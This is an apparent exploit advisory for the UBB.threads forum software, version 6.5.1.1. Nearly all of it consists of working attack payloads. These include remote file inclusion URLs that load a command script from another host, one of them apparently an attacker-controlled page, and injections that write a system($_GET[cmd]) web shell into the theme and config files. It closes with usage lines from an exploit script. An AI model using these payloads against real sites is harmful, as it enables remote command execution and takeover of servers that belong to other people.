UBB.threads Multiple input validation error
UBB.threads Multiple vulnerabilities exploit should allow you to execute commands. Tested on Version 6 (6.5.1.1) and other versions maybe affected. Remote File including ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir and ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir. Files overwrite vulnerabilities if magic_qoutes_gpc = off. Admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/theme.inc.php?cmd=ls -la or admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/config.inc.php?cmd=ls -la. If magic_qoutes_gpc = on admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt? and you will have a command execution files. Exploit: php '.$argv[0].' host Example: php '.$argv[0].' http://localhost/